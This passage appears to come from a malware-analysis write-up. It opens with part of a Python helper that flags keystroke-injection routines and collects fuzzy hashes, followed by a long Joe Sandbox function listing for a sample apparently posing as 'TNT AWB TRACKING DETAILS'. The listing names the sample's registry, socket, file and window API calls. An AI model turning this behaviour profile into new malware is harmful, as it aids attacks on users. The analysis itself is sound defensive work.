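    the shape of a keystroke-injection routine (or AutoIt's Send())."""
    names = {c["name"] for c in rec["apis"] if not c["subcall"]}
    if not {"GetKeyboardState", "SetKeyboardState"} <= names:
        return False
    keys = {hexval(c["args"][2]) for c in rec["apis"]
            if c["name"] == "PostMessageW" and len(c["args"]) >= 3
            and hexval(c["args"][1]) in (0x100, 0x101)}
    return bool(keys & set(VK))


def pivot_hashes(records: List[Dict], predicate) -> List[tuple]:
    """(API String ID, Instruction Fuzzy Hash) of every record the predicate flags."""
    return [(r["fields"].get("API String ID"), r["fields"].get("Instruction Fuzzy Hash"))
            for r in records if predicate(r)]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["fields"].get("API ID"), "| modifier synthesis:", synthesizes_modifier_keys(rec))
        for call in rec["apis"]:
            print("   ", decode_call(call))
```

Feed it the whole function listing of a report and the `pivot_hashes` output is the set of hashes to compare against other samples' execution graphs; because the two keyboard functions on this page differ only in WM_KEYDOWN versus WM_KEYUP, they share an `API String ID` but not an instruction fuzzy hash, which is why both fields are carried.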
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 7f8630ed9f2376e0a9e29b6eeae4c4f4dde465bb6ee74ea8aa59dbbc2f02b070
                                                    • Instruction ID: 7a8a828de6405a205a65c039fde1525355c9f74c2add293cc510e836071b03fb
                                                    • Opcode Fuzzy Hash: 7f8630ed9f2376e0a9e29b6eeae4c4f4dde465bb6ee74ea8aa59dbbc2f02b070
                                                    • Instruction Fuzzy Hash: 4B41C465C1025C76CB11EBB59C4A9CFB7FC9F04310F509866E608F3221FB34A245C7AA
                                                    APIs
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F23697,?), ref: 00F2468B
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F23697,?), ref: 00F246A4
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F236B7
                                                    • _wcscmp.LIBCMT ref: 00F236D3
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F236EB
                                                    • _wcscat.LIBCMT ref: 00F23733
                                                    • SHFileOperationW.SHELL32(?), ref: 00F2379F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: a8e7b64f9e9a6dcb2e9d912e70b1ce297968b98c1024e8ff1c6197854fc53a28
                                                    • Instruction ID: 3a98f42f88d404ff926db6ba8f4308aa5ca7e6671cd38b9eee5bd01132979d58
                                                    • Opcode Fuzzy Hash: a8e7b64f9e9a6dcb2e9d912e70b1ce297968b98c1024e8ff1c6197854fc53a28
                                                    • Instruction Fuzzy Hash: DC41B6B1508358AEC751EF64D841ADF7BECEF89390F10182EF49AC3151EA38D689DB52
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F472AA
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F47351
                                                    • IsMenu.USER32(?), ref: 00F47369
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F473B1
                                                    • DrawMenuBar.USER32 ref: 00F473C4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: 28e6cab46ce7001a1ed02ffa05b76ae3cf6e58379d6b91640339e6cb2191419f
                                                    • Instruction ID: 656da461d99a6fcb3c6046accb058b4a075f038cd1833fc6c85eea6a331e97aa
                                                    • Opcode Fuzzy Hash: 28e6cab46ce7001a1ed02ffa05b76ae3cf6e58379d6b91640339e6cb2191419f
                                                    • Instruction Fuzzy Hash: 04411775A04308EFDB20EF60D884AAABBF8FB05320F149529FD15A7250D730AD54EF50
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F40FD4
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F40FFE
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00F410B5
                                                      • Part of subcall function 00F40FA5: RegCloseKey.ADVAPI32(?), ref: 00F4101B
                                                      • Part of subcall function 00F40FA5: FreeLibrary.KERNEL32(?), ref: 00F4106D
                                                      • Part of subcall function 00F40FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F41090
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F41058
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 2726a4c91df93d57c273a951b5e82758a29910cbe0860df7e2d7f8dd24d20e05
                                                    • Instruction ID: 4f58c7564507b8e16d55401d118faf0412d265e55c33fb46ca1414a84dad60ea
                                                    • Opcode Fuzzy Hash: 2726a4c91df93d57c273a951b5e82758a29910cbe0860df7e2d7f8dd24d20e05
                                                    • Instruction Fuzzy Hash: 41314F75D00109BFDB14DF94DC89EFFBBBCEF19350F000169E905A2141DB745E89AAA0
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00F462EC
                                                    • GetWindowLongW.USER32(01855758,000000F0), ref: 00F4631F
                                                    • GetWindowLongW.USER32(01855758,000000F0), ref: 00F46354
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00F46386
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00F463B0
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F463C1
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F463DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: 94cb64a371e83bb20bdf050038b888a0a395bbd3732fa02b0ae0962f997fe203
                                                    • Instruction ID: ec2e56acfac48f1032b6878dd32450da6f6386c1dddaf6f6325955136a3eec66
                                                    • Opcode Fuzzy Hash: 94cb64a371e83bb20bdf050038b888a0a395bbd3732fa02b0ae0962f997fe203
                                                    • Instruction Fuzzy Hash: BF31E335A441949FEB20CF18DC84F653BE1BB5A724F190165F905DB2B2CB71A844AB52
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DB2E
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DB54
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F1DB57
                                                    • SysAllocString.OLEAUT32(?), ref: 00F1DB75
                                                    • SysFreeString.OLEAUT32(?), ref: 00F1DB7E
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F1DBA3
                                                    • SysAllocString.OLEAUT32(?), ref: 00F1DBB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 9398d00c575396a1f525c9984eac6306884c86b5a77a9c718c9a53040a32c7f2
                                                    • Instruction ID: f5d357029e6c813e63fdd903588549fc818b21c692605fb64c52a21dd8a6f83a
                                                    • Opcode Fuzzy Hash: 9398d00c575396a1f525c9984eac6306884c86b5a77a9c718c9a53040a32c7f2
                                                    • Instruction Fuzzy Hash: F5218B76A05219AF9B10DFA9DC88CEB73ACEB49360B018125FD19DB260DA709C85A760
                                                    APIs
                                                      • Part of subcall function 00F37D8B: inet_addr.WSOCK32(00000000), ref: 00F37DB6
                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00F361C6
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F361D5
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F3620E
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00F36217
                                                    • WSAGetLastError.WSOCK32 ref: 00F36221
                                                    • closesocket.WSOCK32(00000000), ref: 00F3624A
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00F36263
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 8c3f06a9cbd16a2e5b2db6e5a906e587621758652ad26905684afaed29f2c978
                                                    • Instruction ID: 3d02f4947e1b41dceac7e71462ab1158f69829fe169e6350c7bcbed51997d22a
                                                    • Opcode Fuzzy Hash: 8c3f06a9cbd16a2e5b2db6e5a906e587621758652ad26905684afaed29f2c978
                                                    • Instruction Fuzzy Hash: 1731A475600118AFDF10AF24CC85FBE7BA9EB45734F058029FD05E7292CB74AC44AB61
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: a94a6eb5d193318fd889496044db997ac4b28cde00cc87a3208dbb86de66a086
                                                    • Instruction ID: 9cd3c0a11ca7fd45c47b9257aa3f1f635b1bf755109cff3363fc30775c021bf6
                                                    • Opcode Fuzzy Hash: a94a6eb5d193318fd889496044db997ac4b28cde00cc87a3208dbb86de66a086
                                                    • Instruction Fuzzy Hash: B721797260465166D320AA35AC03FE773D8EF5A320F24403AF946D71A1EB519DCAE395
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DC09
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F1DC2F
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00F1DC32
                                                    • SysAllocString.OLEAUT32 ref: 00F1DC53
                                                    • SysFreeString.OLEAUT32 ref: 00F1DC5C
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00F1DC76
                                                    • SysAllocString.OLEAUT32(?), ref: 00F1DC84
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: a24635116c2bad74330b334f0425c3734ff9ef2f85f23ef8ebbf7cccd392de59
                                                    • Instruction ID: 99b545bd73a0e44fd91e8f21089215cc99255b3c7f5be05769950349de47c490
                                                    • Opcode Fuzzy Hash: a24635116c2bad74330b334f0425c3734ff9ef2f85f23ef8ebbf7cccd392de59
                                                    • Instruction Fuzzy Hash: 33217436604208AFDB10DFA9DC88DAB77ECEB19370B108525FD15CB260DAB0DC85E7A4
                                                    APIs
                                                      • Part of subcall function 00EC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EC1D73
                                                      • Part of subcall function 00EC1D35: GetStockObject.GDI32(00000011), ref: 00EC1D87
                                                      • Part of subcall function 00EC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EC1D91
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F47632
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F4763F
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F4764A
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F47659
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F47665
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 5d88a1fa68c57c637f5d2ab4862e7fa1d52ef724914d32f3573a67d968979709
                                                    • Instruction ID: 8d7bcabb13f54b574841bf7650ba69cc5368d081f5bc97bb8eeebcbcdcdd6c41
                                                    • Opcode Fuzzy Hash: 5d88a1fa68c57c637f5d2ab4862e7fa1d52ef724914d32f3573a67d968979709
                                                    • Instruction Fuzzy Hash: 3411B6B211021DBFEF119F64CC85EE77F6DEF08798F014115BA08A2060CB729C21EBA4
                                                    APIs
                                                    • __init_pointers.LIBCMT ref: 00EE9AE6
                                                      • Part of subcall function 00EE3187: EncodePointer.KERNEL32(00000000), ref: 00EE318A
                                                      • Part of subcall function 00EE3187: __initp_misc_winsig.LIBCMT ref: 00EE31A5
                                                      • Part of subcall function 00EE3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EE9EA0
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EE9EB4
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EE9EC7
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EE9EDA
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EE9EED
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EE9F00
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EE9F13
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EE9F26
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EE9F39
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EE9F4C
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EE9F5F
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EE9F72
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EE9F85
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EE9F98
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EE9FAB
                                                      • Part of subcall function 00EE3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EE9FBE
                                                    • __mtinitlocks.LIBCMT ref: 00EE9AEB
                                                    • __mtterm.LIBCMT ref: 00EE9AF4
                                                      • Part of subcall function 00EE9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EE9AF9,00EE7CD0,00F7A0B8,00000014), ref: 00EE9C56
                                                      • Part of subcall function 00EE9B5C: _free.LIBCMT ref: 00EE9C5D
                                                      • Part of subcall function 00EE9B5C: DeleteCriticalSection.KERNEL32(00F7EC00,?,?,00EE9AF9,00EE7CD0,00F7A0B8,00000014), ref: 00EE9C7F
                                                    • __calloc_crt.LIBCMT ref: 00EE9B19
                                                    • __initptd.LIBCMT ref: 00EE9B3B
                                                    • GetCurrentThreadId.KERNEL32 ref: 00EE9B42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                    • String ID:
                                                    • API String ID: 3567560977-0
                                                    • Opcode ID: ce2f005d9ec0201339ffebaae22d62d9edc02eff20a096de8c6eb4b28cf6be6c
                                                    • Instruction ID: e388c6d857b5a801470f2b1c584a1925bf04976864dd375c2c9916a162ef36fd
                                                    • Opcode Fuzzy Hash: ce2f005d9ec0201339ffebaae22d62d9edc02eff20a096de8c6eb4b28cf6be6c
                                                    • Instruction Fuzzy Hash: FAF0963251979D59E77477777C0764A36D19F02738F20262AF558F51D3EF2084414164
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EE3F85), ref: 00EE4085
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00EE408C
                                                    • EncodePointer.KERNEL32(00000000), ref: 00EE4097
                                                    • DecodePointer.KERNEL32(00EE3F85), ref: 00EE40B2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 6c1a4b9ce1662de40ead0f9701883b1646e7cbb5f431afec2abdfad3a1900cfa
                                                    • Instruction ID: 54aa45136f84d130829a0f6cb450c525b8b074b1f64f46bd100f2235d9bea6ac
                                                    • Opcode Fuzzy Hash: 6c1a4b9ce1662de40ead0f9701883b1646e7cbb5f431afec2abdfad3a1900cfa
                                                    • Instruction Fuzzy Hash: F5E0BF74941708DFEB509F61EC0DB653AA4B716F46F104125F905E11F0CBB68608FB15
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 5012a48467faa442fc0b7f55185493ef327567d69c1ea96b7cda04f3a9f232bc
                                                    • Instruction ID: 0233601dc8d1ac24594fb41736ff4bab3ef7345ac539e7e0e2ea20f3877d29aa
                                                    • Opcode Fuzzy Hash: 5012a48467faa442fc0b7f55185493ef327567d69c1ea96b7cda04f3a9f232bc
                                                    • Instruction Fuzzy Hash: 6261AD3190026A9BCF05EF60CD86FFE3BA5AF04318F044528F855AB292DB75EC46DB50
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F3FDAD,?,?), ref: 00F40E31
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F402BD
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F402FD
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F40320
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F40349
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F4038C
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F40399
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
